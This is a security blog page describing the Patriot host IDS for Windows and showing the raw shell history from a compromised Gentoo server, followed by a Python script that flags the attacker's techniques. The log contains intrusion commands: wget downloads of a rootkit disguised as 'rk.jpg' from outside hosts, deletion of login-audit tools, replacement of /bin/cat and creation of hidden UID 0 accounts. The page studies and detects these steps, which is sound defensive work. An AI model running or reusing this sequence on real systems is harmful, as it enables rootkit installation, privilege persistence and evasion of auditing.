Patriot Host IDS

Patriot is a ‘Host IDS’ tool that allows real-time monitoring of
changes in Windows systems and of network attacks.

Patriot monitors:
Changes in Registry keys: Indicating whether any sensitive key
(autorun, internet explorer settings…) is altered.
New files in ‘Startup’ directories
New Users in the System
New Services installed
Changes in the hosts file
New scheduled jobs
Alteration of the integrity of Internet Explorer: (New BHOs,
configuration changes, new toolbars)
Changes in ARP table (Prevention of MITM attacks)
Installation of new Drivers
New NetBIOS shares
TCP/IP Defense (New open ports, new connections made by processes,
PortScan detection…)
Files in critical directories (New executables, new DLLs…)
New hidden windows (cmd.exe / Internet Explorer using OLE objects)
NetBIOS connections to the System
ARP Watch (New hosts in your network)
NIDS (Detect anomalous network traffic based on editable rules)

Patriot NG 2.0: Protection against MITM attacks (video by Jesús Moreno León on Vimeo).

Homepage: http://www.security-projects.com/?Patriot_NG

Another Compromised Server

Sometimes I wonder how IT consultancies go ahead and install Linux, in this case Gentoo,

and then get compromised/hacked in such a “dumb” way.

It's fine that Linux is “secure”, but you'll agree that certain tools have to be configured to prevent this kind of attack, and worse still, to prevent someone from getting root on the system.

I obtained this log last night, with the network administrator's permission, from a compromised server.

# Here are the logs

id
w
cat /etc/issue
cat /proc/infocpu
cat /proc/cpuinfo
php -v
cd /dev/shm
ls
pwd
wget linux2.go.ro/rk.jpg
ls
wget linux2.go.ro/rk.jpg
ls
w
uname -a
wget linux2.go.ro/rk.jpg
wget sentimente.zapto.org/rk.jpg
ls
pwd
pwd
wget 210.243.4.4/~local/rk.jpg
ls
tar zxfv rk.jpg
./setup teiubesccamy 20
chmod +x *
./setup teiubesccamy 20
rm -rf /usr/bin/last
rm -rf /usr/bin/lastlog
last
lastlog
mv /bin/cat /bin/cat1
nano /bin/cat
nano /bin/cat
id
pico /bin/cat
ls
./setup teiubesccamy 20
wget http://nasa.undernet.nm.ru/pico.tgz
w
/usr/sbin/useradd -o -u 0 Zomby
/usr/sbin/useradd -o -u 0 ZombyNebunu
/usr/sbin/useradd -o -u 0 zomby
/usr/sbin/userdel Zomby
/usr/sbin/userdel ZombyNebunu
/usr/sbin/useradd -o -u 0 Petru
/usr/sbin/useradd -o -u 0 Petru85
/usr/sbin/userdel Petru
/usr/sbin/userdel Petru85
/usr/sbin/useradd -o -u 0 zomby
/usr/sbin/useradd -o -u 0 zomby85
ls
cat /etc/issue
cat /etc/passwd
cat /etc/passwd
passwd zomby85
/usr/sbin/userdel zombynebunu
/usr/sbin/userdel zomby
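The history above shows the pattern this post complains about: a payload staged in /dev/shm and unpacked from a file with an image extension, the login-audit tools last/lastlog deleted, /bin/cat swapped out, and a second UID 0 account created with useradd -o. The following Python script is an added example (not from the post or from the Patriot project) that runs simple detection rules over constructed copies of such history lines and of an /etc/passwd file; the sample data and rule names are assumptions of this example.

```python
import re

# Constructed sample of /etc/passwd after the intrusion (not the real server's file):
# "useradd -o -u 0 zomby85" leaves a second account with UID 0.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/false
zomby85:x:0:0::/home/zomby85:/bin/bash
www:x:80:80:www:/var/www:/bin/false
"""

# Constructed excerpt modelled on the attacker's shell history shown above.
SAMPLE_HISTORY = """cd /dev/shm
tar zxfv rk.jpg
rm -rf /usr/bin/last
rm -rf /usr/bin/lastlog
mv /bin/cat /bin/cat1
/usr/sbin/useradd -o -u 0 zomby85
passwd zomby85
"""

# Each rule is (name, regex over one history line). The patterns cover the
# techniques visible in the log: duplicate-root account creation, removal of
# login-audit tools, replacing a core binary, staging in /dev/shm, and an
# archive disguised with an image extension.
HISTORY_RULES = [
    ("uid0_account_created", re.compile(r"useradd\b.*-o\b.*-u\s*0\b")),
    ("audit_tool_removed", re.compile(r"rm\s+-rf\s+/usr/bin/(last|lastlog)\b")),
    ("core_binary_replaced", re.compile(r"^\s*(mv|cp)\s+/bin/\S+\s+/bin/\S+")),
    ("staged_in_dev_shm", re.compile(r"^\s*cd\s+/dev/shm\b")),
    ("archive_with_image_ext", re.compile(r"tar\s+\S*x\S*\s+\S+\.(jpg|gif|png)\b")),
]

def extra_uid0_accounts(passwd_text):
    # Return every account name other than 'root' whose numeric UID is 0.
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            found.append(fields[0])
    return found

def scan_history(history_text):
    # Return (rule_name, line) for every history line that matches a rule,
    # in the order the lines appear.
    hits = []
    for line in history_text.splitlines():
        for name, pattern in HISTORY_RULES:
            if pattern.search(line):
                hits.append((name, line.strip()))
    return hits
```

On a live host the same functions can be fed the contents of /etc/passwd and of each user's shell history file; an unexpected UID 0 account or a hit on the audit-tool rule is grounds to treat the box as compromised and rebuild it rather than clean it.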